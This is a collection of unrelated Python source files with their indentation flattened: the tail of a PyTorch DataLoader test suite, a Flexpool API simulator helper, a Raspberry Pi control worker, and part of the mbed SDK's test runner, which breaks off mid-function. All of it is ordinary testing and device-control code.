transposed_data = list(zip(*data))
self.inp = torch.stack(transposed_data[0], 0)
self.tgt = torch.stack(transposed_data[1], 0)
def pin_memory(self):
self.inp = self.inp.pin_memory()
self.tgt = self.tgt.pin_memory()
return self
def is_pinned(self):
return self.inp.is_pinned() and self.tgt.is_pinned()
# Workaround for https://github.com/pytorch/pytorch/issues/50661
# Classes from `__main__` can not be correctly unpickled from spawned module
# See https://docs.python.org/3/library/multiprocessing.html#multiprocessing-programming
self_module = __import__(os.path.splitext(os.path.basename(__file__))[0])
def collate_wrapper(batch):
return self_module.SimpleCustomBatch(batch)
def collate_into_packed_sequence(batch):
data = torch.stack([sample[0] for sample in batch], 1)
t, b = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, enforce_sorted=False)
def collate_into_packed_sequence_batch_first(batch):
data = torch.stack([sample[0] for sample in batch], 0)
b, t = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, batch_first=True, enforce_sorted=False)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestCustomPinFn(TestCase):
def setUp(self):
super(TestCustomPinFn, self).setUp()
inps = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
tgts = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
self.dataset = TensorDataset(inps, tgts)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin_worker(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True, num_workers=1)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
class TestWorkerQueueDataset(Dataset):
def __init__(self, data):
self.data = data
self.worker_id = None
def worker_init_fn(self, worker_id):
self.worker_id = worker_id
def __getitem__(self, item):
return self.worker_id, self.data[item]
def __len__(self):
return len(self.data)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"Flaky with ASAN, see https://github.com/pytorch/pytorch/issues/65727")
class TestIndividualWorkerQueue(TestCase):
def setUp(self):
super(TestIndividualWorkerQueue, self).setUp()
self.dataset = TestWorkerQueueDataset(list(range(128)))
def _run_ind_worker_queue_test(self, batch_size, num_workers):
loader = DataLoader(
self.dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers,
timeout=5, worker_init_fn=self.dataset.worker_init_fn
)
current_worker_idx = 0
for i, (worker_ids, sample) in enumerate(loader):
self.assertEqual(worker_ids.tolist(), [current_worker_idx] * batch_size)
self.assertEqual(sample.tolist(), list(range(i * batch_size, (i + 1) * batch_size)))
current_worker_idx += 1
if current_worker_idx == num_workers:
current_worker_idx = 0
def test_ind_worker_queue(self):
max_num_workers = None
if hasattr(os, 'sched_getaffinity'):
try:
max_num_workers = len(os.sched_getaffinity(0))
except Exception:
pass
if max_num_workers is None:
cpu_count = os.cpu_count()
if cpu_count is not None:
# Use half number of CPUs
max_num_workers = cpu_count // 2
if max_num_workers is None:
max_num_workers = 1
for batch_size in (8, 16, 32, 64):
for num_workers in range(0, min(6, max_num_workers)):
self._run_ind_worker_queue_test(batch_size=batch_size, num_workers=num_workers + 1)
class SetAffinityDataset(IterableDataset):
def __iter__(self):
torch.randperm(1)
after = os.sched_getaffinity(0)
return iter(after)
def worker_set_affinity(_):
os.sched_setaffinity(0, [multiprocessing.cpu_count() - 1])
@unittest.skipIf(
not hasattr(os, 'sched_setaffinity'),
"os.sched_setaffinity is not available")
class TestSetAffinity(TestCase):
def test_set_affinity_in_worker_init(self):
dataset = SetAffinityDataset()
dataloader = torch.utils.data.DataLoader(
dataset, num_workers=2, worker_init_fn=worker_set_affinity)
for sample in dataloader:
self.assertEqual(sample, [multiprocessing.cpu_count() - 1])
class ConvDataset(Dataset):
def __init__(self):
self.x = torch.ones(1, 1, 24000)
# Call convolution on parent process
self[0]
def __len__(self):
return 1
def __getitem__(self, index):
return torch.nn.functional.conv1d(self.x, torch.ones(1, 1, 2))
@unittest.skipIf(IS_WINDOWS, "Needs fork")
class TestConvAfterFork(TestCase):
# Tests crash reported in https://github.com/pytorch/pytorch/issues/53565
def test_conv_after_fork(self):
loader = DataLoader(ConvDataset(), num_workers=1)
for x in loader:
self.assertEqual(x.shape, (1, 1, 1, 23999))
if __name__ == '__main__':
run_tests()
|
simutils.py
|
#
# Software distrubuted under MIT License (MIT)
#
# Copyright (c) 2020 Flexpool
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import json
import threading
import requests
import time
def selftest_api_method():
return "1"
class APISimulator:
def __init__(self, app):
self.app = app
self.thread = None
app.route("/selftest")(selftest_api_method)
def start(self):
self.thread = StoppableThread(target=self.app.run, daemon=True)
self.thread.start()
while True:
try:
if requests.get("http://localhost:5000/selftest").text == "1":
break
except requests.ConnectionError:
pass
time.sleep(1)
def stop(self):
self.thread.stop()
class StoppableThread(threading.Thread):
# https://stackoverflow.com/questions/323972/is-there-any-way-to-kill-a-thread
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stop_event = threading.Event()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
def wrap_response(data):
return json.dumps({"result": data, "error": None})
|
pi_control_worker.py
|
import time
import datetime
import json
import redis
import threading
import sys
sys.path.append('..')
from controls.pi.button_control import (ButtonControl)
import variables
#r = redis.Redis(host='127.0.0.1', port=6379)
# def clamp(n, smallest, largest): return max(smallest, min(n, largest))
class PiControlWorker():
def __init__(self, config, main_thread_running, system_ready):
#self.config = {**config, **self.config}
self.config = config
self.channel = config.get('channel', 'controls').replace(" ", "_").lower()
self.sleep_duration = config.get('sleep_duration', 0.5)
self.main_thread_running = main_thread_running
self.system_ready = system_ready
#Store pump event so we can shutdown pump with float readings
self.controls = []
self.init_controls()
return
def dynamic_import(self, name):
#Split path of the class folder structure: {sensor name}_sensor . {SensorName}Sensor
components = name.split('.')
#Dynamically import root of component path
module = __import__(components[0])
#Get component attributes
for component in components[1:]:
module = getattr(module, component)
return module
def init_controls(self):
for control in self.config['controls']:
if control.get('type', None) is not None:
#Get the control from the controls folder {control name}_control.{ControlName}Control
control_type = 'controls.pi.' + control.get('type').lower() + '_control.' + control.get('type').capitalize() + 'Control'
imported_control = self.dynamic_import(control_type)
#new_control = imported_control(control.get('pin'), name=control.get('name', control.get('type')), connection=self.connection, key=control.get('key', None))
# Define default kwargs for all control types, conditionally include optional variables below if they exist
control_kwargs = {
'name' : control.get('name', control.get('type')),
'pin' : control.get('pin'),
'key' : control.get('key', None),
'topic': control.get('topic', None),
'resistor': control.get('resistor', None),
'edge_detection': control.get('edge_detection', None),
'debounce': control.get('debounce', None)
}
# optional control variables
# add conditional control vars here...
new_control = imported_control(**control_kwargs)
new_control.init_control()
self.controls.append(new_control)
print('{type} Control {pin}...\t\t\t\033[1;32m Ready\033[0;0m'.format(**control))
return
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
print('Pi Control Worker [' + str(len(self.config['controls'])) + ' Controls]...\t\033[1;32m Running\033[0;0m')
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
readings = {}
for control in self.controls:
result = control.read()
readings[control.key] = result
time.sleep(self.sleep_duration)
#This is only ran after the main thread is shut down
print("Pi Control Worker Shutting Down...\t\033[1;32m Complete\033[0;0m")
|
test_api.py
|
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
import os
import re
import sys
import json
import uuid
import pprint
import random
import optparse
import datetime
import threading
import ctypes
from types import ListType
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from time import sleep, time
from Queue import Queue, Empty
from os.path import join, exists, basename
from threading import Thread, Lock
from subprocess import Popen, PIPE
# Imports related to mbed build api
from workspace_tools.tests import TESTS
from workspace_tools.tests import TEST_MAP
from workspace_tools.paths import BUILD_DIR
from workspace_tools.paths import HOST_TESTS
from workspace_tools.utils import ToolException
from workspace_tools.utils import construct_enum
from workspace_tools.targets import TARGET_MAP
from workspace_tools.test_db import BaseDBAccess
from workspace_tools.build_api import build_project, build_mbed_libs, build_lib
from workspace_tools.build_api import get_target_supported_toolchains
from workspace_tools.build_api import write_build_report
from workspace_tools.build_api import prep_report
from workspace_tools.build_api import prep_properties
from workspace_tools.build_api import create_result
from workspace_tools.build_api import add_result_to_report
from workspace_tools.libraries import LIBRARIES, LIBRARY_MAP
from workspace_tools.toolchains import TOOLCHAIN_BIN_PATH
from workspace_tools.test_exporters import ReportExporter, ResultExporterType
import workspace_tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from workspace_tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception, _:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print self.single_test.generate_test_summary(test_summary, shuffle_seed)
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print self.single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_auto_detect = _opts_auto_detect
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
for toolchain in toolchains:
tt_id = "%s::%s" % (toolchain, target)
T = TARGET_MAP[target]
# print target, toolchain
# Test suite properties returned to external tools like CI
test_suite_properties = {
'jobs': self.opts_jobs,
'clean': clean,
'target': target,
'vendor': T.extra_labels[0],
'test_ids': ', '.join(test_ids),
'toolchain': toolchain,
'shuffle_random_seed': self.shuffle_random_seed
}
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Target platform not found'% (target))
continue
build_mbed_libs_options = ["analyze"] if self.opts_goanna_for_mbed_sdk else None
clean_mbed_libs_options = True if self.opts_goanna_for_mbed_sdk or clean or self.opts_clean else None
try:
build_mbed_libs_result = build_mbed_libs(T,
toolchain,
options=build_mbed_libs_options,
clean=clean_mbed_libs_options,
verbose=self.opts_verbose,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties)
if not build_mbed_libs_result:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Toolchain %s is not yet supported for this target'% (T.name, toolchain))
continue
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building MBED libs for %s using %s'% (target, toolchain))
continue
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
# Update database with shuffle seed f applicable
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _shuffle_seed=self.shuffle_random_func())
self.db_logger.disconnect();
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
# Update MUTs and Test Specification in database
self.db_logger.update_build_id_info(self.db_logger_build_id, _muts=self.muts, _test_spec=self.test_spec)
# Update Extra information in database (some options passed to test suite)
self.db_logger.update_build_id_info(self.db_logger_build_id, _extra=json.dumps(self.dump_options()))
self.db_logger.disconnect();
valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids)
skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
for skipped_test_id in skipped_test_map_keys:
test_suite_properties['skipped'].append(skipped_test_id)
# First pass through all tests and determine which libraries need to be built
libraries = []
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
# Detect which lib should be added to test
# Some libs have to compiled like RTOS or ETH
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
libraries.append(lib['id'])
build_project_options = ["analyze"] if self.opts_goanna_for_tests else None
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Build all required libraries
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
options=build_project_options,
verbose=self.opts_verbose,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties)
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building library %s'% (lib_id))
continue
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
# TODO: move this 2 below loops to separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
# Prepare extended test results data structure (it can be used to generate detailed test report)
if target not in self.test_summary_ext:
self.test_summary_ext[target] = {} # test_summary_ext : toolchain
if toolchain not in self.test_summary_ext[target]:
self.test_summary_ext[target][toolchain] = {} # test_summary_ext : toolchain : target
tt_test_id = "%s::%s::%s" % (toolchain, target, test_id) # For logging only
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(test.source_dir,
join(build_dir, test_id),
T,
toolchain,
test.dependencies,
options=build_project_options,
clean=clean_project_options,
verbose=self.opts_verbose,
name=project_name,
macros=MACROS,
inc_dirs=INC_DIRS,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
project_id=test_id,
project_description=test.get_description())
except ToolException:
project_name_str = project_name if project_name is not None else test_id
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building project %s'% (project_name_str))
# Append test results to global test summary
self.test_summary.append(
(self.TEST_RESULT_BUILD_FAILED, target, toolchain, test_id, 'Toolchain build failed', 0, 0, '-')
)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
self.test_summary_ext[target][toolchain][test_id].append({ 0: {
'result' : self.TEST_RESULT_BUILD_FAILED,
'output' : '',
'target_name' : target,
'target_name_unique': target,
'toolchain_name' : toolchain,
'id' : test_id,
'description' : 'Toolchain build failed',
'elapsed_time' : 0,
'duration' : 0,
'copy_method' : None
}})
continue
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
# For an automated test the duration act as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
if handle_results is None:
continue
for handle_result in handle_results:
if handle_result:
single_test_result, detailed_test_results = handle_result
else:
continue
# Append test results to global test summary
if single_test_result is not None:
self.test_summary.append(single_test_result)
# Add detailed test result to test summary structure
if target not in self.test_summary_ext[target][toolchain]:
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
append_test_result = detailed_test_results
# If waterfall and consolidate-waterfall options are enabled,
# only include the last test result in the report.
if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
self.test_suite_properties_ext[target][toolchain] = test_suite_properties
q.put(target + '_'.join(toolchains))
return
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
q = Queue()
# Generate seed for shuffle if seed is not provided in
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
build_report = {}
build_properties = {}
if self.opts_parallel_test_exec:
###################################################################
# Experimental, parallel test execution per singletest instance.
###################################################################
execute_threads = [] # Threads used to build mbed SDL, libs, test cases and execute tests
# Note: We are building here in parallel for each target separately!
# So we are not building the same thing multiple times and compilers
# in separate threads do not collide.
# Inside execute_thread_slice() function function handle() will be called to
# get information about available MUTs (per target).
for target, toolchains in self.test_spec['targets'].iteritems():
self.test_suite_properties_ext[target] = {}
t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, build_report, build_properties))
t.daemon = True
t.start()
execute_threads.append(t)
for t in execute_threads:
q.get() # t.join() would block some threads because we should not wait in any order for thread end
else:
# Serialized (not parallel) test execution
for target, toolchains in self.test_spec['targets'].iteritems():
if target not in self.test_suite_properties_ext:
self.test_suite_properties_ext[target] = {}
self.execute_thread_slice(q, target, toolchains, clean, test_ids, build_report, build_properties)
q.get()
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
self.db_logger.disconnect();
return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, build_report, build_properties
def get_valid_tests(self, test_map_keys, target, toolchain, test_ids):
valid_test_map_keys = []
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names.split(','):
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_peripheral_by_names and test.peripherals and not len([i for i in test.peripherals if i in self.opts_peripheral_by_names.split(',')]):
# We will skip tests not forced with -p option
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral test skipped for target %s'% (target))
continue
if test.automated and test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
# When users are using 'build only flag' and test do not have
# specified peripherals we can allow test building by default
pass
elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names.split(','):
# If we force peripheral with option -p we expect test
# to pass even if peripheral is not in MUTs file.
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral %s test skipped for target %s'% (",".join(test.peripherals), target))
else:
print self.logger.log_line(self.logger.LogType.INFO, 'Test %s skipped for target %s'% (test_id, target))
continue
# The test has made it through all the filters, so add it to the valid tests list
valid_test_map_keys.append(test_id)
return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows text x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
